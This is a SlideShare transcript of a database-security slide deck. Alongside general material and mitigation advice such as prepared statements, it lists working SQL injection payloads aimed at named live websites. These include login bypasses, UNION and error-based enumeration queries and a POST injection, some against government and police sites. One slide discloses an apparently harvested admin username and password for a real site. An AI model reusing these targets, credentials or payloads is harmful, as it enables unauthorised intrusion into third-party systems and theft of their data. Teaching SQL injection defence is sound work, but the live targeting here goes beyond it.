SlideShare a Scribd company logo
Database and Database Security..
DATABASE & DATABASE
SECURITY
BY
REHAN MANZOOR
What actually is a database
 Code and Filing concept
+
History of Database
Major Database Vendors
Interaction with Database
How we Interact (Direct
Queries)
Custom defined functions
Stored Procedures
Stored Procedures
Integration with Languages
Static Apps
Dynamic Apps
Need in CMS
How We Integrate
 Well that is the real question how we
integrate.. It create a problem when we don‘t
attach app with a database correctly.. Code
is important
Contents continued..
 Database Attacks
 What is a Database Attack
 Explanation
 OWASP Rating (damage rate)
 Destruction of SQL injection
 History Reviews
 Recent bidding in underground
Database Attacks
 Excessive Privileges
 Privileges abuse
 Unauthorized privilege elevation
 Platform Vulnerabilities
 Sql Injection
 Weak Audit
 Denial of Service
Top 10 vuln by OWASP
Destruction of SQL Injection
Attack
 Heartland Payment Systems
This New Jersey payment processing firm lost
data on tens of millions of credit cards in an
attack in 2009. Around 175,000 businesses
were affected by the theft.
 TJX
More than 45 million people had their credit card
details stolen and some experts said the actual
figure was likely to be closer to 94 million.
Recent Bidding in Underground
Login on Live Sites
 http://www.equinet.ch/fr/gestion/login.php
 1' OR '1'='1
 http://lionsclubofwashim.co.in/admin.php
 1' OR '1'='1
 admin.axilbusiness.in
 1' OR '1'='1
 http://www.anemos.in/admin/
 1' OR '1'='1
 Query Code
 CODE
select username, password from admin
where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
Union based attack
 http://greenforce.com.pk/page.aspx?page_id=24
+UNION+ALL+SELECT+null,null,@@version,null,null,null,nul
l-- -
 http://www.philatourism.com/page.aspx?id=-3 UNION ALL
SELECT table_name,null,null,null,null,null from
information_schema.tables—
 http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all
select '1',null –
 Code
select * from tblName where
id=‗‖+RequestQueryString[‗id‘]+‖‘;
Error Based Attack
 http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
 http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and
1=convert(int,@@version)-- -&category_id=2
 http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='adminlogin'
and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
 http://www.grabbbit.com/admin/login.aspx
 userid admin
 password grabbbit$
 Code
 Select column1,column2,column3, from table1 join table2 on table1.column1 =
table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
Blind Attack
 fgcineplex.com.sg/Images/slideshow/sizzlings
oul.php
 Code
well query is same here like union but problem
is with labels here.. Their designer could are
not picked.. Either they are also stored in
database or they they cannot work with union
POST Sql Injection
 url:
 http://haryanapolice.gov.in/police/pressreleases/s
earch.asp
 Post
 text1=rummy'&text2=11/11/2010&SUBMIT=search
 Code
select * from tablename where text1=
Request.Form[―text1"].ToString() and text2=
Request.Form[―text1"].ToString();
Why Sql Injection Possible
 Who is responsible Database or Programmer
 Why Not To Blame Database
 Database Secure Nature
 Lack of awareness
 No research base study
 Lack of interest
 Non professional coders
Detection of SQL Injection
 Manual Check
 Why
 How
 By Whom
 Automated Check
 Tools
 Scanners
Securing From SQL Injection
 Learn About it
 Firewalls
 By Code
 Don‘t Disclose any parameter as possible
 Giving session user least possible rights
 Blacklisting evil keywords for the session user
 User input validation
 Using prepared statements
More on Firewalls
 USE Of Firewall
 As it is
 Customized
 Buffer overflows
 Null bytes
 Difference between a normal user and Hacker
Buffer Overflows
 Live example
 https://www.qmensolutions.com/remote_suppo
rt_packs.php?packs=9%27--%20-
 Bypassing from keyword
Live Hack Of A Website
 http://aquaservices.co.in/
Conclusion
 Although databases and their contents are
vulnerable to a host of internal and external
threats, it is possible to reduce the attack
vectors to near zero. By addressing these
threats you will meet the requirements of the
most regulated industries in the world.

More Related Content

PPTX
Database security and privacy
PPT
Database Security
PPTX
DBMS SECURITY
PDF
Database security
PPT
Database security
PPTX
Database Security
PPTX
Database security
PDF
Distributed database security with discretionary access control
Database security and privacy
Database Security
DBMS SECURITY
Database security
Database security
Database Security
Database security
Distributed database security with discretionary access control

What's hot (20)

PPTX
Security and Integrity of Data
PPTX
01 database security ent-db
PPTX
Database Security And Authentication
PPT
Dbms ii mca-ch12-security-2013
PPT
DB security
PPTX
security and privacy in dbms and in sql database
PPTX
Security of the database
PPTX
Database security
PPT
Data base security
PPT
Database security
 
PPTX
Database modeling and security
PDF
Chapter 5 database security
PPTX
Data base security & integrity
PPTX
Database security and security in networks
PPTX
Database security
PDF
Database security issues
PPT
Lesson10 Database security
PDF
Security and Integrity
PDF
Database Security
PDF
Database security
Security and Integrity of Data
01 database security ent-db
Database Security And Authentication
Dbms ii mca-ch12-security-2013
DB security
security and privacy in dbms and in sql database
Security of the database
Database security
Data base security
Database security
 
Database modeling and security
Chapter 5 database security
Data base security & integrity
Database security and security in networks
Database security
Database security issues
Lesson10 Database security
Security and Integrity
Database Security
Database security
Ad

Viewers also liked (20)

PPT
Ch 12 O O D B Dvlpt
PPT
Database Life Cycle
PPT
Database Systems Security
PPTX
Database management system basic, database, database management, learn databa...
PPT
PPS
Introduction to Mysql
PDF
CBSE XII Database Concepts And MySQL Presentation
PPT
MySql slides (ppt)
PPTX
Data base management system
PPS
Database Design Slide 1
PPT
Dbms
PPT
Database Management Systems (DBMS)
DOCX
Database management system
PPT
Data Base Management System
PPTX
Introduction to database
PDF
Cloud History 101
PDF
My Top 10 slides on presentations
PPTX
Database administrator
PPT
Database Development Process
PPTX
Dbms slides
Ch 12 O O D B Dvlpt
Database Life Cycle
Database Systems Security
Database management system basic, database, database management, learn databa...
Introduction to Mysql
CBSE XII Database Concepts And MySQL Presentation
MySql slides (ppt)
Data base management system
Database Design Slide 1
Dbms
Database Management Systems (DBMS)
Database management system
Data Base Management System
Introduction to database
Cloud History 101
My Top 10 slides on presentations
Database administrator
Database Development Process
Dbms slides
Ad

Similar to Database and Database Security.. (20)

PPTX
Sql injection
PDF
A METHOD OF DETECTING SQL INJECTION ATTACK TO SECURE WEB APPLICATIONS
PPTX
Data base security and injection
PDF
SQL Injection Prevention by Adaptive Algorithm
PDF
E017131924
PPTX
SQL Injections - 2016 - Huntington Beach
PPTX
Application Security 101 (OWASP DC)
PDF
sql injection login bypass sqli-191017162412.pdf
PPTX
SQL injection
PDF
Think Like a Hacker - Database Attack Vectors
PPTX
Keeping Private Data Private
PPT
8 sql injection
PPT
Securing Applications
PPT
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
PPT
Final review ppt
PPTX
Code injection and green sql
PPTX
Greensql2007
PDF
Devbeat Conference - Developer First Security
PPT
Web security presentation
PPT
PHPUG Presentation
Sql injection
A METHOD OF DETECTING SQL INJECTION ATTACK TO SECURE WEB APPLICATIONS
Data base security and injection
SQL Injection Prevention by Adaptive Algorithm
E017131924
SQL Injections - 2016 - Huntington Beach
Application Security 101 (OWASP DC)
sql injection login bypass sqli-191017162412.pdf
SQL injection
Think Like a Hacker - Database Attack Vectors
Keeping Private Data Private
8 sql injection
Securing Applications
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
Final review ppt
Code injection and green sql
Greensql2007
Devbeat Conference - Developer First Security
Web security presentation
PHPUG Presentation

Recently uploaded (20)

PDF
Getting Started with Data Integration: FME Form 101
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
project resource management chapter-09.pdf
PDF
Heart disease approach using modified random forest and particle swarm optimi...
PPTX
OMC Textile Division Presentation 2021.pptx
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
PPTX
TLE Review Electricity (Electricity).pptx
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
PDF
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
PDF
Mushroom cultivation and it's methods.pdf
PDF
DP Operators-handbook-extract for the Mautical Institute
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PDF
Enhancing emotion recognition model for a student engagement use case through...
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
PDF
A novel scalable deep ensemble learning framework for big data classification...
PPTX
Chapter 5: Probability Theory and Statistics
PDF
August Patch Tuesday
PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDF
Hybrid model detection and classification of lung cancer
Getting Started with Data Integration: FME Form 101
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
project resource management chapter-09.pdf
Heart disease approach using modified random forest and particle swarm optimi...
OMC Textile Division Presentation 2021.pptx
Group 1 Presentation -Planning and Decision Making .pptx
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
TLE Review Electricity (Electricity).pptx
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
Mushroom cultivation and it's methods.pdf
DP Operators-handbook-extract for the Mautical Institute
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Enhancing emotion recognition model for a student engagement use case through...
SOPHOS-XG Firewall Administrator PPT.pptx
A novel scalable deep ensemble learning framework for big data classification...
Chapter 5: Probability Theory and Statistics
August Patch Tuesday
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
Hybrid model detection and classification of lung cancer

Database and Database Security..

  • 3. What actually is a database  Code and Filing concept +
  • 7. How we Interact (Direct Queries)
  • 15. How We Integrate  Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important
  • 16. Contents continued..  Database Attacks  What is a Database Attack  Explanation  OWASP Rating (damage rate)  Destruction of SQL injection  History Reviews  Recent bidding in underground
  • 17. Database Attacks  Excessive Privileges  Privileges abuse  Unauthorized privilege elevation  Platform Vulnerabilities  Sql Injection  Weak Audit  Denial of Service
  • 18. Top 10 vuln by OWASP
  • 19. Destruction of SQL Injection Attack  Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.  TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
  • 20. Recent Bidding in Underground
  • 21. Login on Live Sites  http://www.equinet.ch/fr/gestion/login.php  1' OR '1'='1  http://lionsclubofwashim.co.in/admin.php  1' OR '1'='1  admin.axilbusiness.in  1' OR '1'='1  http://www.anemos.in/admin/  1' OR '1'='1  Query Code  CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
  • 22. Union based attack  http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- -  http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—  http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –  Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  • 23. Error Based Attack  http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -  http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2  http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown  http://www.grabbbit.com/admin/login.aspx  userid admin  password grabbbit$  Code  Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  • 24. Blind Attack  fgcineplex.com.sg/Images/slideshow/sizzlings oul.php  Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
  • 25. POST Sql Injection  url:  http://haryanapolice.gov.in/police/pressreleases/s earch.asp  Post  text1=rummy'&text2=11/11/2010&SUBMIT=search  Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();
  • 26. Why Sql Injection Possible  Who is responsible Database or Programmer  Why Not To Blame Database  Database Secure Nature  Lack of awareness  No research base study  Lack of interest  Non professional coders
  • 27. Detection of SQL Injection  Manual Check  Why  How  By Whom  Automated Check  Tools  Scanners
  • 28. Securing From SQL Injection  Learn About it  Firewalls  By Code  Don‘t Disclose any parameter as possible  Giving session user least possible rights  Blacklisting evil keywords for the session user  User input validation  Using prepared statements
  • 29. More on Firewalls  USE Of Firewall  As it is  Customized  Buffer overflows  Null bytes  Difference between a normal user and Hacker
  • 30. Buffer Overflows  Live example  https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20-  Bypassing from keyword
  • 31. Live Hack Of A Website  http://aquaservices.co.in/
  • 32. Conclusion  Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.